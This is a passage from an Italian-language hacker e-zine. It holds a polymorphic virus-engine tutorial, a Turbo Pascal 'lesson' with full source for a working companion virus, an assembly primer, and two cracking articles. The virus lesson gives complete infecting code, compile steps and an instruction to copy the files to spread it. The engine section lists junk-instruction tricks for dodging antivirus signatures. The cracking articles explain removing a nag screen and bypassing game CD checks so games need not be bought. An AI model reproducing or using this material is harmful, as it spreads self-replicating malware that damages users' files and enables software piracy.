0007: E2F7 LOOP $0001
0008: %qui inizia il corpo del virus in forma cifrata

l'operatore crittografico XOR pu• essere variato, usando ad esempio ADD e SUB
che generano i seguenti codici:

0004: 8104BC2E ADD WORD PTR [SI],2EBC

0004: 812CBC2E SUB WORD PTR [SI],2EBC

abbiamo in totale quindi 3 trasformazioni del nostro motore (XOR, ADD, SUB),
dove per• cambia solo un bytes. Un'altra variazione si pu• operare sul segmento
dati ES, nei file COM possiamo usare in alternativa anche i segmenti DS e CS.

0003: 2E CS:

0003: 3E DS:

Con quest'altre due variazioni il numero di trasformazioni cresce a 9, con due
bytes di differenza. Altra modifica possibile Š sul registro di indirizzamento
dati SI, che pu• essere alternato con DI e BX generando numerose varianti di
codice:

Usando BX
0001: BB0800 MOV BX,0008
/ 8137BC2E XOR WORD PTR [BX],2EBC
0004: - | 8107BC2E ADD WORD PTR [BX],2EBC
\ 812FBC2E SUB WORD PTR [BX],2EBC
0005: 46 INC BX

Usando SI
0001: BF0800 MOV DI,0008
/ 8135BC2E XOR WORD PTR [DI],2EBC
0004: - | 8105BC2E ADD WORD PTR [DI,2EBC
\ 812DBC2E SUB WORD PTR [DI],2EBC
0005: 47 INC DI

In questo modo le combinazioni ottenute crescono veramente tanto e il motore si
riduce a qualcosa del tipo:

0001: ??0800 MOV ??,0008
0002: B9F401 MOV CX,01F4
0003: ?? ??:
0004: 81??BC2E ?? WORD PTR [??],2EBC
0005: ?? INC ??
0006: ?? INC ??
0007: E2F7 LOOP $0001

Dove l'indirizzo "0008" e la chiave di cifratura "2EBC" variano da file a file,
quindi la stringa del virus si riduce a soli 6 bytes costanti:

"?? ?? ?? B9 F4 01 ?? 81 ?? ?? ?? ?? ?? E2 F7"

niente male, davvero! Si pu• ancora migliorare il polimorfismo di questo motore
usando le "junk instruction", ovvero del codice inutile e indifferente che pu•
essere inserito per spezzare i bytes costanti. Ecco alcuni esempi di junk che
non alterano il codice di un programma:

- aggiunge il valore "0" a un registro 16-bit
050000 ADD AX,0000
83C600 ADD SI,+00
83C500 ADD BP,+00

- toglie il valore "0" a un registro 16-bit
83EB00 SUB BX,+00
83EF00 SUB DI,+00
83EC00 SUB SP,+00

- stesse di prima ma su registri a 8-bit
0400 ADD AL,00
80E900 SUB CL,00

- PUSH e POP una dietro l'altra
50 PUSH AX
58 POP AX

- caricamento di un registro 16-bit con s‚ stesso
89C0 MOV AX,AX
89FF MOV DI,DI
89ED MOV BP,BP

- caricamento di un registro 16-bit con s‚ stesso
87DB XCHG BX,BX
87F6 XCHG SI,SI
87E4 XCHG SP,SP

- stesse di prima ma su registri a 8-bit
88C0 MOV AL,AL
88F6 MOV DH,DH
86DB XCHG BL,BL
86ED XCHG CH,CH

- salti condizionali inutili (0-jump)
EB00 JMP seguente
7500 JNZ seguente
7400 JZ seguente
7F00 JG seguente
7700 JA seguente

E la lista potrebbe continuare, c'Š solo l'imbarazzo della scelta. Inserendo
istruzioni di questo tipo dentro al codice non solo si sende il codice pi—
contorto da districare, ma si rende la lunghezza della stringa variabile,
modificando ogni volta la posizione dei pochi bytes costanti rimasti.


PRIMA LEZIONE
Programmazione di un virus Companion usando Turbo Pascal

La maggioranza dei virus viene scritta in linguaggi a basso livello, che
operano pi— velocemente e pi— vicino al cuore del sistema operativo; tuttavia
tentativi di realizzare virus usando linguaggi ad alto livello (tipo BASIC,
C++, PASCAL) sono stati fatti, con risultati pi— o meno buoni. Questa specie di
virus viene identificata dalla sigla "HLLx", che sta per "High Level Language"
mentre la "x" identifica meglio il tipo di parassita:

O=overwriting virus (virus che sovrascrive i files durante le infezioni, con
danni irreparabili)
C=companion virus
P=parasitic virus

L'esempio di questa lezione sar… un semplice virus di tipo Companion (HLLC
quindi) scritto usando il pi— comune dei linguaggi: il Turbo Pascal. E'
richiesta solo una conoscenza base (non approfondita) del linguaggio per capire
il listato del virus.

}--------------------------> INIZIO <---------------------------{
{Type: COMPANION VIRUS
Desc: Ricerca e infetta 1 file EXE, creando il file COM corrispondente con una
copia del virus. Ogni dir contiene al massimo 3 file EXE infetti}

{$M 1024,0,1024} {Direttive al compilatore per ottimizzare l'uso
di memoria RAM}
PROGRAM VIRUS_SAMPLE1;
USES DOS,CRT,STRINGS;
TYPE CHARFILE=FILE OF CHAR;

VAR File1,File2: SearchRec;
VirFile: string[12];
F,G: CHARFILE;
anno, mese, giorno, nomegiorno: Word;

{Ricava il nome del file COM dall'EXE trovato}
PROCEDURE ConverteNomeEXE(VAR File1:SearchRec);
VAR i:integer;
BEGIN
i:=0;
WHILE (i<=8) AND (File1.Name[i]<>'.') DO BEGIN
VirFile[i]:=File1.Name[i];
inc(i);
END;
virfile[i]:='.';
virfile[i+1]:='C';
virfile[i+2]:='O';
virfile[i+3]:='M';
END;

{Riceve un file Sorgente e uno Destinazione e li copia}
PROCEDURE CopiaFile(VAR S,D:CHARFILE);
VAR byte:char;
BEGIN
ASSIGN(D,VirFile); ASSIGN(S,File2.Name);
REWRITE(D); RESET(S);
WHILE NOT EOF(S) DO BEGIN
READ(S,byte);
WRITE(D,byte);
END;
CLOSE(S); CLOSE(D);
END;

{Modifica il file COM per eseguire l'applicazione ospite}
PROCEDURE ModificaFile(VAR F:CHARFILE);
VAR i:integer; byte:char;
BEGIN
RESET(F);
SEEK(F,1081);
i:=0;
WHILE (i<=8) AND (File1.Name[i]<>'.') DO BEGIN
WRITE(F,File1.Name[i]);
inc(i);
END;
byte:='.'; WRITE(F,byte);
byte:='E'; WRITE(F,byte);
byte:='X'; WRITE(F,byte);
byte:='E'; WRITE(F,byte);
byte:=chr(00); WRITE(F,byte);
CLOSE(F);
END;

{Main}
BEGIN
ClrScr; {cancella lo schermo}
FindFirst('*.EXE', Archive, File1); {cerca il primo file EXE}

{se Š stato trovato almeno un file EXE si prosegue}
IF DosError = 0 THEN BEGIN

ConverteNomeEXE(File1);
{Vede se esiste gi… un COM nascosto, quindi il file Š gi… infetto}
FindFirst(VirFile, Hidden, File2);

{se non esiste c'Š errore e si pu• procedere con l'infezione}
IF DosError<>0 THEN BEGIN
FindFirst('*.COM', Hidden, File2);
CopiaFile(G,F);
ModificaFile(F);
SetFAttr(F, 34);
END
ELSE BEGIN
{se il primo EXE Š gi… infetto cerca il secondo EXE}
FindNext(File1);
ConverteNomeEXE(File1);
FindFirst(VirFile, Hidden, File2);
IF DosError<>0 THEN BEGIN
FindFirst('*.COM', Hidden, File2);
CopiaFile(G,F);
ModificaFile(F);
SetFAttr(F, 34);
END

ELSE BEGIN
{se il secondo EXE Š gi… infetto cerca il terzo EXE}
FindNext(File1);
ConverteNomeEXE(File1);
FindFirst(VirFile, Hidden, File2);
IF DosError<>0 THEN BEGIN
FindFirst('*.COM', Hidden, File2);
CopiaFile(G,F);
ModificaFile(F);
SetFAttr(F, 34);
END;

END;
END;
END;

{routine di attivazione "payload"}
GetDate(anno,mese,giorno,nomegiorno);
IF (mese=1) AND (giorno=1) THEN BEGIN
CLRSCR;
WRITELN('Date:',giorno,'/',mese,'/',anno);
WRITELN('Right Moment to Buy an Antivirus!');
WRITELN;
WRITELN('HLLC.7200 Companion Virus');
WRITELN('Pascal Sample Written for VIROPEDIA
1.0');
READLN;
END;

{ritorna all'esecuzione del programma originale}
Exec('12345678.EXE','');
END.

}---------------------------> FINE <----------------------------{

Per compilare questo virus bisogna usare queste accortezze:

- compilare il sorgente usando TURBO PASCAL o BP
- rinominare il file ottenuto con "12345678.COM"
- impostare al file attributo nascosto "ATTRIB +H 12345678.COM"
- creare un file EXE ospite per il virus col nome "12345678.EXE"

potete creare il file ospite usando lo stesso Pascal (per restare in tema.)

PROGRAM FIRST_HOST;
BEGIN
WRITELN('HLLC.7200 Virus Sample for Viropedia');
WRITELN('Primo ospite campione per');
WRITELN('la replicazione del virus');
END.

Il virus Š ora pronto, basta copiare i file "12345678.COM" e "12345678.EXE" per
diffonderlo. Il suo metodo di infezione consiste nel ricercare fino a 3 file
EXE nella dir corrente e a creare un file COM corrispondente nascosto. Il file
COM contiene una copia del virus che viene eseguita subito, quindi il file
ritorna il controllo al file EXE originale. L'attivazione di questo virus
(innocua) consiste nel mostrare un messaggio a video il giorno 1 Gennaio di
qualsiasi anno.


SECONDA LEZIONE
Nozioni base di Assembly

Come tutti voi sapete i virus sono scritti in un linguaggio molto vicino a
quello "naturale" del computer, l'Assembly; i listati scritti in questo
linguaggio sono caratterizzati dall'estensione ASM (a volte anche A86). Prima
di passare alla scrittura di un virus in assembly, facciamo una breve
carrellata su questo linguaggio e sulle sue funzionalit….

ALGEBRA
Un buon programmatore assembly deve conoscere necessariamente l'aritmetica
binaria e quella esadecimale. Il nostro sistema tradizionale di numerazione
(decimale) usa 10 simboli (0-1-2-3-4-5-6-7-8-9) per rappresentare i numeri; il
sistema binario ne usa solo 2 (0-1), quello esadecimale, abbreviato con "hex",
ne usa 16 (0-1-2-3-4-5-6-7-8-9-A-B-C-D-E-F). Il fattore di conversione Š un
puro calcolo matematico; ovviamente un numero rappresentato in binario occuper…
pi— cifre di uno in decimale, mentre uno in forma hex sar… meno lungo di uno
decimale.

Esempio: DEC=1234 BIN=10011010010 HEX=4D2

Sotto ASM Š possibile gestire molto praticamente questi 3 diversi sistemi di
numerazione, quello di default Š il decimale, ma Š possibile scrivere numeri
negli altri formati aggiungendo "B" e "H" alla fine del numero.

Esempio: 10011010010B 4D2H
I numeri hex non possono cominciare con
una lettera
A55H non Š ammesso, 0A55H s

REGISTRI
Gli elementi chiave dell'assembly sono i registri, ovvero delle particolari
celle di memoria che possono memorizzare determinati valori. La dimensione dei
registri dipende dal processore e dalla compilazione usata, inizieremo a
lavorare con i registri a 16-bit (2 BYTE=1 WORD).

Registri a 16-bit

AX BX CX DX

SI DI

CS DS ES SS

BP SP IP

I primi 4 registri sono ancora suddivisi in registri a 8-bit, che indicano
rispettivamente la parte alta e la parte bassa del registro.

AX Accumulatore (diviso in AH e AL)
BX Puntatore memoria (diviso in BH e BL)
CX Contatore dei cicli (diviso in CH e CL)
DX Dati (diviso in DH e DL)

SI Sorgente dati
DI Destinazione dati

Abbiamo poi i registri di segmento, che indicano delle porzioni di memoria RAM
da 64K.

CS Code Segment (segmento codice in esecuzione)
DS Data Segment (segmento zona dati)
ES Extra Segment (segmento aggiuntivo)
SS Stack Segment (segmento stack)

BP Base Pointer (punta la cima dello stack)
SP Stack Pointer (punta la fine dello stack)
IP Instruction Pointer (punta l'istruzione corrente)

I registri che possono indirizzare la memoria, cioŠ riferirsi a dei dati
contenuti in un certo punto della RAM, sono solo BX,SI e DI. Nei processori 386
e superiori esistono i registri a 32-bit che richiedono debugger particolari
per il loro controllo.

Registri a 32-bit

EAX EBX ECX EDX

ESI EDI

CS DS ES SS FS GS

EBP ESP EIP


Volete vedere dal vivo i registri? Usate il comando del dos chiamato "DEBUG"
(lo userete molto spesso!) e seguite l'esempio:

C:\>DEBUG
-R
AX=0000 BX=0000 CX=0000 DX=0000 SP=FFEE BP=0000 SI=0000 DI=0000
DS=0E3C ES=0E3C SS=0E3C CS=0E3C IP=0100 NV UP EI PL NZ NA PO NC
0E3C:0100 37 AAA
-

Il comando "R" vi d… lo stato attuale dei registri, inoltre viene restituita
anche l'istruzione da eseguire (AAA), con il relativo codice hex. L'istruzione
seguente Š sempre puntata dall'indirizzo CS:IP. Esistono poi alcuni "tester"
chiamati FLAG. Essi sono degli switch che possono valere 0 o 1 e scattano in
date condizioni:

CF Carry Flag Flag di riporto, indica un riporto nelle somme e nelle
sottrazioni.

PF Parity Flag Bit di parit…, viene usato nei processi di comunicazione

ZF Zero Flag Se Š settato indica che il risultato di una operazione
Š zero

SF Sign Flag Flag di segno, indica se considerare il numero in
assoluto o col segno

TF Trap Flag Usato dal debugger per controllare l'esecuzione
passo-passo (trappola)

DF Direction Indica il verso in cui bisogna lavorare con le stringhe
(1=avanti, 0=indietro)

ISTRUZIONI BASE
Ora che conoscete i registri possiamo passare alla presentazione di alcune
istruzioni base del linguaggio, le pi— comuni e usate:

ADD
Addizione tra due registri, tra un numero e un registro, tra un'area di memoria
e un registro, tra un'area di memoria e un numero. Esempio:

Codice Istruzione
053412 ADD AX,1234 ;aggiunge in AX il valore 1234H
01D0 ADD AX,DX ;aggiunge in AX il valore di DX
00F4 ADD AH,DH ;aggiunge in AH il valore di DH
00DC ADD AH,BL ;aggiunge in AH il valore di BL
0307 ADD AX,[BX] ;aggiunge in AX il valore WORD puntato
dall'indirizzo di BX
0207 ADD AL,[BX] ;aggiunge in AX il valore BYTE puntato
dall'indirizzo di BX
80C199 ADD CL,99 ;aggiunge in CL il valore 99H

Come potete notare Š possibile operare solo con registri della stessa
dimensione o con registri e valori dello stesso formato. Ad esempio
un'addizione del numero 1234 (16-bit) al registro AL (8-bit) Š errata. Inoltre
in caso di ambiguit… bisogna specificare se il dato da manipolare Š di tipo
WORD (16-bit) o di tipo BYTE (8-bit), usando l'istruzione "PTR"

800711 ADD BYTE PTR [BX],11
81073412 ADD WORD PTR [BX],1234

Se il numero risultato eccede per il registro, il flag di riporto verr… settato
su ON. L'istruzione non pu• accedere direttamente ai registri di segmento, ad
esempio se si vuole aggiungere 100 a DS bisogna farlo indirettamente.

SUB
Funzione inversa di ADD, effettua la sottrazione tra numeri, registri o valori.
Stesso funzionamento di ADD.

INC / DEC
Nel caso di addizione o sottrazione di 1, si possono usare queste due
istruzioni, molto pi— veloci e ridotte in termini di spazio:

050100 ADD AX,0001 40 INC AX
83EB01 SUB BX,+01 4B DEC BX
^^^^^^^ ^^
3 bytes 1 byte

Non si possono usare direttamente sui registri di segmento.

MOV
Muove un valore dentro a un registro, o un registro dentro un altro registro,
un valore dentro un'area di memoria o un registro dentro un'area di memoria.

B83412 MOV AX,1234 ; carica in AX il valore 1234H
89FE MOV SI,DI ; carica in SI il valore di DI
C7073412 MOV WORD PTR [BX],1234 ; carica nella zona puntata da
[BX] 1234H
8907 MOV [BX],AX ; carica nella zona puntata da
[BX] AX

Usando questa istruzione Š possibile accedere ai registri di segmento e
modificarli:

8CDA MOV DX,DS ; carica in DX il valore di DS
81C20001 ADD DX,0100 ; aggiunge 100H a DX
8EC2 MOV ES,DX ; carica in ES il valore di DX

Non sono ammesse manipolazioni sui registri CS e IP.

PUSH / POP
Permettono di salvare un registro o il valore puntato da un registro nello
stack per poi ripristinarlo.
Domanda: quanto vale AX dopo aver eseguito queste istruzioni:

B80001 MOV AX,0100
50 PUSH AX
050001 ADD AX,0100
58 POP AX

Risposta: vale ancora 100H, perch‚ il valore viene salvato con PUSH e poi
ripristinato.
In questo modo Š anche possibile manipolare i registri di segmento, come
abbiamo visto prima con l'istruzione MOV.

1E PUSH DS
5A POP DX
81C20001 ADD DX,0100
52 PUSH DX
1F POP DS

E' l'equivalente dell'istruzione MOV vista poc'anzi. Non si possono tuttavia
salvare registri a 8-bit (PUSH AL non Š ammessa). PUSH va a memorizzare il
valore all'indirizzo puntato dal registro SP e sottrae 2 a questo registro; la
POP si comporta inversamente, restituisce il valore puntato da SP e gli
aggiunge 2.

NOP
E' un'istruzione progettata per non fare nulla, assolutamente nulla. A cosa
serve direte voi?? Per le ottimizzazioni di codice, cioŠ per sincronizzare le
esecuzioni e i trasferimenti dati. Il suo codice esadecimale Š 90H.

CMP
Istruzione di confronto, serve per confrontare tra di loro due registri, delle
posizioni di memoria.

39D8 CMP AX,BX ; confronto tra registri 16-bit
38D8 CMP AL,BL ; confronto tra registri 8-bit
39FE CMP SI,DI ; confronto tra registri 16-bit
3904 CMP [SI],AX ; confronto tra valore puntato e
registro
3B0F CMP CX,[BX] ; confronto tra registro e valore
puntato
3D3412 CMP AX,1234 ; confronto tra registro e valore
diretto 16-bit
80FC12 CMP AH,12 ; confronto tra registro e valore
diretto 8-bit
803C12 CMP BYTE PTR [SI],12 ; confronto tra val. puntato e val.
diretto 8-bit
813D3412 CMP WORD PTR [DI],1234 ; confronto tra val. puntato e val.
diretto 16-bit
Non si possono confrontare tra di loro due valori diretti o due valori puntati
contemporaneamente. Occorre caricare uno di essi prima in un registro e poi
eseguire il confronto su quel registro.

JMP
Salta a un indirizzo, simile all'istruzione GOTO del Basic. Si pu• usare in
diversi formati:

E9FD03 JMP 0500 ; salta all'indirizzo 500H
EA78563412 JMP 1234:5678 ; salta all'indirizzo 5678H del segmento
di memoria 1234H
FFE3 JMP BX ; salta al valore di BX
FF27 JMP [BX] ; salta al valore puntato dal registro BX

JNZ / JZ
Salti condizionali, eseguono il salto se una data condizione Š vera o no. In
questo caso la condizione Š data dallo zero flag, esistono per• altri tipi di
salti:

JNC / JC salta se non c'Š / se c'Š riporto (Jump if Not Carry)
JNA / JA salta se non Š superiore / se Š superiore (Jump if Not Above)
JNB / JB salta se non Š inferiore / se Š inferiore (Jump if Not Below)
JCXZ salta se il registro CX Š zero (Jump if CX is Zero)

Di solito il salti condizionali seguono ad un'istruzione CMP o ad una OR. I
salti condizionali hanno un limite (range) per cui non si possono fare salti
dall'indirizzo corrente ad uno che superi i 181H (385D) bytes.

....continua sul prossimo numero!

[Il file Sample01.zip contiene i listati e gli eseguibili del virus companion
di cui si parla nell'articolo]
PFloriK


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍCRACKiNGÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ NAG SCREEN CHE PASSi0NE ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Salve amici, ci sono molte cose che odio nella mia vita e tra queste c'e' la
pasta scotta, la gente in ritardo agli appuntamenti, ed i NAG SCREEN.
Detto questo credo che abbiate capito che non ho intenzione di fare un articolo
di cucina ne' uno di morale, ma un piccolo aiuto a tutti quelli che odiano
avere il proprio prg. preferito con all'interno scritte di ogni tipo.
Oggi Internet sembra aver preso il posto delle numerose BBS a cui ognuno di noi
si collegava, ma questo non e' cosi', da qui la necessita' di avere un
programma di comunicazione installato.
Il programma che ho preso in esame e' il Telix 115d, che secondo il mio
illustrissimo parere e' il migliore in giro sulla rete.
Non ho intenzione di parlarvi del crack che potrete facilmente procuravi (o
richiedermelo se proprio non lo trovate in giro!), ma del nag screen iniziale
che anche se avete lanciato il crack vi lascia sempre la scritta UNREGISTERED
in rosso al centro del logo di telix.
Qualcuno di voi potra' dire e chi se ne frega, il programma gira quindi .... Ma
vi assicuro che e' veramente frustrante!!
Passiamo al pratico: quello che vi serve e' un buon hex editor ed il visual c++
un po' esagerato direte voi, ma questo e' il modo piu' semplice per fare quello
che dobbiamo fare :-)
Aprite con il vostro hex editor l'eseguibile di telix e cercate la stringa
unregistered.............ne troverete diverse, sostituitele tutte con quello
che piu' vi aggrada e provate a rilanciare il programma.
Mmmmm! Non va il logo e' sempre coperto da quel maledetto UNREGISTERED, ma
allora che abbiamo combinato prima? Semplice, abbiamo cambiato
quell'unregistered che e' presente a fianco del titolo della finestra.
Allora le ipotesi sono 3: o la scritta e' criptata in qualche modo, o e'
presente in qualche libreria oppure e' grafica!!!
Di queste ne sono vere 2, infatti e' grafica ed e' presente in una libreria!
Allora passiamo all'azione, caricate il C++, caricate in memoria la libreria
telixr.dll (provate ad immaginare per che cosa stia quella R !!!), aprite la
cartella con le bitmap e poi clickate sul 111.
WOW eccovi scovata la famosa scritta unregistered, adesso il problema e' che se
provate a cancellare la grafica otterrete un bel buco bianco allo start di
telix, se provate a togliere il subfolder 111 si impianta tutto, quindi la
soluzione consiste nel ridurre le dimensioni della scritta ad un pixel e
cambiargli colore con un grigio che si confonda con lo sfondo, salvate la
libreria (che diverra' un pochino piu' grande se non disabilitate le opzioni
per il debug), Et voila' il gioco e' fatto!!! Ovviamente in questo modo potrete
cambiare qualsiasi grafica non vi aggradi all'interno di qualsiasi prg che ve
lo permetta!
Questo e' uno degli approcci possibili per ottenere il risultato voluto, ma
avreste anche potuto cercare la CALL che abilitava la bitmap 111 ed eliminarla!
Alla prossima puntata, bye!
The_Hawk


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍCRACKiNGÍÍÍÄÄÄÄÄÄÄÄÄ MiNi GUiDA PER SPR0TEGGERE i Gi0CHi ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍͼ
DEDiCATA A CHi Di CRACKiNG N0N NE SA NULLA ;-)

Questa guida cos come Š scritto nel titolo Š dedicata a chi di cracking non ne
capisce nulla ma ha la necessit… di sproteggere un gioco senza impazzire con
programmi come softice e simili.
Con i consigli che troverete qui di seguito riuscirete a sproteggere solo una
piccola parte dei giochi che trovate in commercio (diciamo un 20%?) ma mi
sembra meglio di niente no? Allora perchŠ abbiamo la necessit… di sproteggere
un gioco?
Forse perchŠ non ci va di comprarlo originale o perchŠ non abbiamo un
masterizzatore per poter fare la copia fisica? Quante volte ci Š capitato che
un nostro amico ci ha prestato un gioco originale che ha appena comprato e non
siamo riusciti a farlo funzionare perchŠ pur copiando l'intero CD su hard disk
una volta lanciato l'eseguibile mi usciva sempre fuori la famosa scritta
"inserire il cd nel lettore".
Gli scopi di questa guida sono:
- elencare una serie di sistemi che permettono di saltare il cd-check (presenza
del cd originale all'interno del lettore)
- dare qualche consiglio su come far okkupare ai giochi il minor spazio
possibile una volta che sono stati copiati su HD
- come utilizzare il game wizard per craccare i giochi (scritto da CAVALLO)
Ripeto questi sistemi funzionano solo a volte e in pochi casi ma vi assicuro
che prima che anche io cominciassi ad usare softice e prima di comprarmi il
masterizzatore li usavo spesso e qualche volte con una buona dose di culo e
intuito riuscivo a sproteggere il gioco.

PARTE 1: VARI SISTEMI PER "SALTARE IL CD-CHECK"

Nota: Š sottointeso che per far funzionare questi metodi io debba copiare
l'intero cd o sua parte (vedi Parte 2) sull'HD. Solo in alcuni casi
l'installazione max da parte del gioco Š sufficiente quindi consiglio sempre di
fare un raffronto tra installazione max e contenuto reale del cd. Molte volte
alcuni file necessari pur facendo l'installazione massima vengono lasciati sul
cd. Quindi controllate gente controllate!

1) METODO INFALLIBILE:
Copiate il gioco su

HD, accedete a internet andate in giro per il web o per 
qualche canale di iRC e vedete se qualcuno ha gi… provveduto per voi. Nel caso
riusciate in ci• il gioco riuscirete a sproteggerlo al 100%. ;-)
Dai su stavo solo scherzando... ora inizio a scrivere qualcosa di serio e di
utile, comunque se non riuscite a sproteggere il gioco con nessuno dei sistemi
sotto elencati provate a cercare il crack sulla rete o cominciate a studiare
seriamente l'arte del cracking. un buon punto di partenza in lingua italiana Š
la famosa: The Xoanon's Guide to Cracking ( by Xoanon ).
Detto questo iniziamo seriamente o quasi ;-) .

2) CD-CHECK BASATI SULLA LABEL CD:
Ci sono alcuni giochi che per verificare la presenza del cd nel lettore usano
la label del cd.
Quindi per questo tipo di giochi (non ne ho incontrati molti) basta rinominare
il proprio HD con la stessa label del cd e usare successivamente il famoso
comando subst.
Il subst Š un comando del dos che permette di creare delle unit… virtuali, in
questo caso il gioco vede queste unit… virtuali come un cd-rom, vediamo come
funziona:

SUBST [unit…1: [unit…2:]percorso]
SUBST unit…1: /D
unit…1: Specifica l'unit… virtuale da assegnare al percorso di
ricerca.
[unit…2:]percorso Specifica l'unit… fisica ed il percorso da assegnare
all'unit… virtuale.
/D Elimina l'unit… virtuale specificata.
Digitare SUBST senza parametri per visualizzare l'elenco delle unit… virtuali
esistenti.

Un gioco che utilizza questo tipo di protezione Š il bellissimo MDK, per
sproteggerlo non dovete far altro che copiare il cd su HD in una dir c:\mdk ad
esempio (attenzione che nel cd originale ci sono 200 mega di demo
perfettamente inutili (se usate l'install scegliete l'installazione massima,
okkupa circa 100MB). Una volta fatto ci• rinominate l'hd con la label del cd di
Mdk (MDK) e successivamente usate il comando subst. Nel nostro caso dovremmo
scrivere subst x: c:\mdk dove x: Š una lettera libera.
Nel caso incontriate giochi basati su questo tipo di protezioni vi consiglio di
farvi un bel file .bat. che rinomini automaticamente la label.

3) CD-CHECK CHE SI FREGANO CON IL SUBST:
Non ci crederete ma si riescono a eliminare pi— cd check con il comando subst
del Dos che abbiamo esaminato sopra che con altri programmi simili che
esamineremo in seguito. Volete subito qualche nome? Tra quelli che mi ricordo
vi potrei citare The Dig e Roland Garros 97. Esamineremo il secondo gioco in
quanto pi— recente.
Installate normalmente Roland Garros (45MB) da CD (magari vi consiglio di usare
per il CD in questo caso una lettera che non vi serve tipo G:, per fare ci•
usate gestione periferiche). Una volta installato in c:\rg97 ad esempio
scrivete subst x: c:\rg97 dove x: Š la lettera del drive da dove avete
installato il gioco (per questo motivo sopra vi avevo detto di usare una
lettera in cui normalmente non avete nessuna periferica associata). La lettera
del cdrom si cambia facilmente da gestione periferiche di windows95.

4) CD-CHECK BASATI SUI FILE DI CONFIGURAZIONE O DI SETUP:
A volte alcuni giochi quando vengono installati creano generalmente nella
directory principale di instalalzione dei file con estensione .cfg o dei file
setup.xxx (xxx Š l'estensione). Io vi consiglio di dare sempre uno sguardo con
il comune edit del Dos a questi file. PerchŠ fare ci•?
Semplice a volte all'interno di questi file troviamo diciture tipo:
cdpath= d:\
o
cd= d:\
...
Tutto quello che dobbiamo fare Š cambiare queste diciture con altre di nostro
comodo tipo:
cdpatch= c:\gioco1
o
cd= c:\gioco1
...
Dove gioco1 Š ad esempio la directory in cui noi abbiamo copiato il gioco.
Anche in questo caso facciamo un paio di esempi. Giochi che usano questo tipo
di protezione sono ad esempio Theme Hospital e PowerF1. Nella dir principale
dei giochi in questione troviamo un file .cfg. Diamoci un'occhiata con l'edit
del dos e subito noteremo che compare la lettera d:\ identificativa del CD.
Bene sostituiamola con il path della dir in cui noi abbiamo installato il gioco
e in questo modo il cd-check Š superato.

5) CD-CHECK CHE SI FREGANO USANDO PROGRAMMI TIPO FAKECD O 0CD
Indispensabili per questo tipo di sprotezione Š il possesso dei due programmi
sopracitati, ce ne sono anche degli altri simili ma io vi consiglio questi due
perchŠ sono quelli che mi hanno dato pi— soddisfazioni. Usarli Š semplicissimo
e di solito vanno abbinati al comando subst che abbiamo esaminato
precedentemente.
Questi due programmi permettono di emulare il Cd in maniera abbastanza buona ma
solo in alcuni casi quindi non ci fate troppo affidamento non Š tutto oro
quello che luccica (cazzo ma sono un poeta!). Per l'uso di questi programmi io
consiglio di:
- usarli sotto dos (non il prompt)
- non aver il driver mscdex installato (il cd-rom)
- di usarli abbinati al comando subst
Quindi in questo caso non mi dilungher• in spiegazioni ma passo direttamente ad
un'esempio.
Nel primo Tomb Raider (il primo non so il secondo!) il cd check viene
facilmente saltato usando 0CD e il comando subst abbinati. Naturalmente il
comando subst lo uso sulla "stessa lettera" in cui io ho usato il fake cd o lo
0cd.
p.s. se volete far funzionare i nude patch del suddetto gioco dovete usare per
forza la procedura sopra descritta.

6) CD-CHECK CHE SI FREGANO CON VIRTUAL-CD
Questo programma secondo me Š mitico perchŠ riesce a fregare molte delle
protezioni esistenti.
I giochi che si possono fregare con questo programma sono tantissimi quindi
cercate di procurarvelo. Come funziona? Be Š semplicissimo, basta lanciare il
programma inserire il cd da "craccare" e al resto pensa tutto lui! Praticamente
il programma compatta in un unico file tutto il contenuto del cd e quando noi
vogliamo giocare con il gioco in questione mi basta lanciare il virtual cd
cliccare sul gioco desiderato e via!
Come ho gi… detto poche righe sopra secondo me questo programma Š quello che da
pi— soddisfazioni dal punto di vista di pratico in quanto si riescono a
craccare moltissimi giochi ci sono per• dei contro:
- per fare funzionare i giochi in questione io devo usare sempre detto
programma
- il programma mi fa una sorta di immagine dell'intero cd includendo quindi
anche cose che a volte possono risultare inutili tipo i demo o le directx e
io non le posso eliminare e ci• causa occupazione di spazio su HD del tutto
inutile
- funziona solo sotto windows 95

7) FREGHIAMO IL CD-CHECK TRAMITE IL REG EDIT DI WINDOWS 95
Secondo me regedit (lo trovate all'interno della dir di windows 95) Š uno degli
strumenti pi— belli di windoze, ci si possono fare un sacco di cose, ma vediamo
come usarlo per provare a saltare qualche cd-check (se non ricordo male
funziona con Diablo tra gli altri)
Allora lanciamo il reg edit andiamo in:
HKEY_LOCAL_MACHINE
e successivamente in:
SOFTWARE
Guarda che bello ci sono tutte le marche dei vari giochi che ho installato sul
mio picci (naturalmente stiamo parlando di giochi che funzionano solo per
windows 95, e che facendo l'installazione, vanno a modificare questa sezione
del file di registro). Che faccio io?
Be semplice vado a cercare fra i vari software il mio gioco e do un okkiata ai
"Dati". Se sono tanto fortunato da trovare Cd_Path o roba simile lo vado a
modificare in maniera alquanto agile. Ci siamo capiti no? Chiudo regedit e
provo a lanciare il gioco. Questa procedura a volte Š sufficiente molte altre
volte no.


Prima di passare alla parte 2 un po' di consigli:
- mi raccomando controllate che tutte le parti del cd siano installate (potete
evitare di copiarvi le directx e i demo inclusi spesso nei cd)
- i metodi sopra elencati funzionano si ma solo a volte, cosa saggia sarebbe
lavorare di debugger (leggetevi la guida di xoanon)
- se proprio non riuscite a afre nulla masterizzatevi il cd o provate a
chiedere in giro il crack (trovare crack per giochi Š molto difficile, fate
prima a chiedere dell'eseguibile magari)
- mi raccomando quando modificate i file di cfg o simili fate sempre una copia
di riserva
- so che molte cose non sono spiegate bene, ma cercate di capirmi molte delle
sprotezioni spiegate sopra con un po' di pratica e culo non necessitano di
ulteriori spiegazioni
- in molti casi occorre usare un po di cervello
- sicuramente potrete avere pi— soddisfazioni usando il programma virtual cd
